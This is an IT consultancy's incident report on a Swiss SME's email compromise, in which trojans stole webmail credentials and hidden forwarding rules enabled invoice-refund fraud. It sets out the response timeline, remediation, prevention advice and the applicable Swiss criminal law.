Context: a client, an email, a vulnerability
d-side solutions manages the IT infrastructure of a Swiss SME active in distribution. This includes their domain name, hosting, and email configuration. One autumn morning in 2025, the client contacts us, worried: a supplier received an email seemingly from their address, requesting the cancellation of an order and a refund of CHF 7,000 to an unknown Italian IBAN.
🚨 Initial alert
A service provider receives an email requesting the cancellation of an order and a refund to a foreign bank account. The email is visually identical to those normally sent by our client.
Initially, we suspect classic spoofing — a sender forging the email address without actual access to the mailbox. But the reality proves far more serious.
Attack anatomy
After investigation, we discover it's not spoofing but an active man-in-the-middle (MITM) attack on the email. The attacker doesn't send fake emails — they intercept real ones, modify them, and reroute them. Replies from recipients are also diverted.
// Intercepted attack flow
legitimate sender
intercepts & modifies
receives tampered version
receives nothing
intercepts replies
replies normally
The attacker maintains two parallel conversations unknown to both parties
Intrusion vector: hidden forwarding rules
Analysis of the webmail account reveals that two automatic forwarding rules had been created without the client's knowledge. All incoming emails were silently forwarded to two third-party Gmail addresses, never appearing as read or redirected in the mailbox.
Trojan discovery
In parallel, we have the client's workstations analyzed by multiple antivirus solutions. Several trojans are identified, presumably responsible for stealing webmail credentials, despite an active commercial antivirus.
⚠ Technical note
An active antivirus does not guarantee real-time detection of all trojans. Modern malware uses encryption and signature mutation techniques to bypass real-time engines, while being detected during a later full scan.
Incident response timeline
Day 0 — Detection
Alert from the defrauded supplier
A service provider contacts the client after receiving a suspicious email with an IBAN refund request. d-side solutions is immediately contacted.
Day 0 — Containment
Immediate password change
The password is changed. However, we discover that emails continue to be intercepted — forwarding rules are password-independent.
Day +1 — Investigation
Discovery of forwarding rules
Analysis of Horde 5.2.x webmail account. Identification and immediate deletion of the two malicious forwarding rules and the trash filter.
Day +2 — Workstation analysis
Multi-tool antivirus scan
Full analysis with Bitdefender + Malwarebytes on all Windows workstations. Discovery and cleanup of multiple trojans.
Following weeks — Hardening
Complete infrastructure hardening
Migration to modern webmail, 2FA activation, SPF/DKIM/DMARC verification, client training, mandatory phone verification for any IBAN change.
Technical analysis: why it worked
💡 Key point
SPF, DKIM and DMARC protect against external spoofing. They do not protect against an attacker who has legitimate access to the mailbox via stolen credentials. This is precisely what happened here.
The client was using Horde webmail version 5.2.x, an outdated version with known vulnerabilities. The attacker likely obtained credentials via the trojans on the workstations, then created the forwarding rules — a mundane, invisible action that persists even after a password change.
🚨 Critical lesson
Changing your password is not enough after a compromise. You must audit and remove all filtering, forwarding, and auto-transfer rules from the email account.
Remediation measures implemented
- ✓Removed malicious rules — forwarding and trash filter immediately deleted.
- ✓Password rotation — all email and application passwords changed.
- ✓Cleaned infected workstations — all trojans removed, systems and antivirus updated.
- ✓2FA activation — on email and all critical services.
- ✓Migrated to secure webmail — replaced obsolete Horde interface.
- ✓Filed report with NCSC — formal incident report submitted to Swiss National Cyber Security Centre.
- ✓Out-of-band procedure — any bank detail change now requires phone confirmation.
How to prevent this type of attack
Use an up-to-date webmail, enable SPF, DKIM, DMARC and 2FA, regularly audit forwarding and filtering rules on email accounts, and perform regular full antivirus scans. On the organizational side: establish an out-of-band procedure for bank detail changes and train your staff.
Swiss legal framework: your options
In Switzerland, this type of attack falls under several articles of the Criminal Code:
⚖ Swiss Criminal Code (SCC)
Art. 143bis SCC — Unauthorized access to a data processing system: up to 3 years.
Art. 143 SCC — Unauthorized obtaining of data: up to 5 years.
Art. 179novies SCC — Unauthorized obtaining of personal data: up to 1 year.
Summary
A man-in-the-middle attack on email is not reserved for large corporations. Swiss SMEs are prime targets precisely because they have established trust relationships with partners, significant transaction amounts, and sometimes less maintained systems.
Beyond the direct financial loss — which was limited in this case — the real danger lies in the reputational damage. When your business partners receive fraudulent emails that appear to come from your address, it's the trust built over years that's put at stake. Restoring that credibility takes far longer than cleaning up a mailbox.
In this case, an up-to-date webmail and 2FA activation would have significantly reduced the attack surface. The rapid response by d-side solutions helped contain the incident and initiate appropriate legal proceedings.
If you think your professional email may be compromised, or want to have your email security audited, contact us.
Luc Demierre
Founder & IT Consultant — d-side solutions Sàrl, Fribourg
Specialized in IT architecture, systems security and e-commerce integration for Swiss SMEs. Founder of d-side solutions Sàrl since 2022.